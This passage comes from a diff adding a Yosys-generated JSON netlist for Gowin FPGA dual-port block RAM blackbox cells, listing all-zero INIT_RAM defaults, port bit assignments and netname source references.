"0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE0": "0", + "READ_MODE1": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE0": "00", + "WRITE_MODE1": "00" + }, + "ports": { + "CLKA": { + "direction": "input", + "bits": [ 2 ] + }, + "CEA": { + "direction": "input", + "bits": [ 3 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 4 ] + }, + "CEB": { + "direction": "input", + "bits": [ 5 ] + }, + "OCEA": { + "direction": "input", + "bits": [ 6 ] + }, + "OCEB": { + "direction": "input", + "bits": [ 7 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 8 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 9 ] + }, + "WREA": { + "direction": "input", + "bits": [ 10 ] + }, + "WREB": { + "direction": "input", + "bits": [ 11 ] + }, + "ADA": { + "direction": "input", + "bits": [ 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 ] + }, + "ADB": { + "direction": "input", + "bits": [ 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 ] + }, + "BLKSELA": { + "direction": "input", + "bits": [ 40, 41, 42 ] + }, + "BLKSELB": { + "direction": "input", + "bits": [ 43, 44, 45 ] + }, + "DIA": { + "direction": "input", + "bits": [ 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61 ] + }, + "DIB": { + "direction": "input", + "bits": [ 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77 ] + }, + "DOA": { + "direction": "output", + "bits": [ 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93 ] + }, + "DOB": { + "direction": "output", + "bits": [ 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1062.14-1062.17" + } + }, + "ADB": { + "hide_name": 0, + "bits": [ 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1062.19-1062.22" + } + }, + "BLKSELA": { + "hide_name": 0, + "bits": [ 40, 41, 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1063.13-1063.20" + } + }, + "BLKSELB": { + "hide_name": 0, + "bits": [ 43, 44, 45 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1063.22-1063.29" + } + }, + "CEA": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1058.13-1058.16" + } + }, + "CEB": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1058.24-1058.27" + } + }, + "CLKA": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1058.7-1058.11" + } + }, + "CLKB": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1058.18-1058.22" + } + }, + "DIA": { + "hide_name": 0, + "bits": [ 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1064.14-1064.17" + } + }, + "DIB": { + "hide_name": 0, + "bits": [ 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1064.19-1064.22" + } + }, + "DOA": { + "hide_name": 0, + "bits": [ 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1065.15-1065.18" + } + }, + "DOB": { + "hide_name": 0, + "bits": [ 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1065.20-1065.23" + } + }, + "OCEA": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1059.7-1059.11" + } + }, + "OCEB": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1059.13-1059.17" + } + }, + "RESETA": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1060.7-1060.13" + } + }, + "RESETB": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1060.15-1060.21" + } + }, + "WREA": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1061.7-1061.11" + } + }, + "WREB": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1061.13-1061.17" + } + } + } + }, + "DPX9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1729.1-1814.10" + }, + "parameter_default_values": { + "BIT_WIDTH_0": "00000000000000000000000000010010", + "BIT_WIDTH_1": "00000000000000000000000000010010", + "BLK_SEL": "000", + "INIT_RAM_00": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_01": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_02": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_03": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_04": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_05": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_06": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_07": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_08": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_09": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_0F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_10": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_11": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_12": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_13": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_14": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_15": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_16": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_17": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_18": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_19": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_1F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_20": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_21": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_22": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_23": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_24": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_25": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_26": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_27": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_28": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_29": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_2F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_30": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_31": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_32": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_33": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_34": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_35": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_36": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_37": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_38": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_39": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3A": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3B": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3C": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3D": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3E": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "INIT_RAM_3F": "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000", + "READ_MODE0": "0", + "READ_MODE1": "0", + "RESET_MODE": "SYNC", + "WRITE_MODE0": "00", + "WRITE_MODE1": "00" + }, + "ports": { + "DOA": { + "direction": "output", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "DOB": { + "direction": "output", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "DIA": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + }, + "DIB": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "BLKSEL": { + "direction": "input", + "bits": [ 74, 75, 76 ] + }, + "ADA": { + "direction": "input", + "bits": [ 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90 ] + }, + "ADB": { + "direction": "input", + "bits": [ 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104 ] + }, + "WREA": { + "direction": "input", + "bits": [ 105 ] + }, + "WREB": { + "direction": "input", + "bits": [ 106 ] + }, + "CLKA": { + "direction": "input", + "bits": [ 107 ] + }, + "CLKB": { + "direction": "input", + "bits": [ 108 ] + }, + "CEA": { + "direction": "input", + "bits": [ 109 ] + }, + "CEB": { + "direction": "input", + "bits": [ 110 ] + }, + "OCEA": { + "direction": "input", + "bits": [ 111 ] + }, + "OCEB": { + "direction": "input", + "bits": [ 112 ] + }, + "RESETA": { + "direction": "input", + "bits": [ 113 ] + }, + "RESETB": { + "direction": "input", + "bits": [ 114 ] + } + }, + "cells": { + }, + "netnames": { + "ADA": { + "hide_name": 0, + "bits": [ 77, 78, 79, 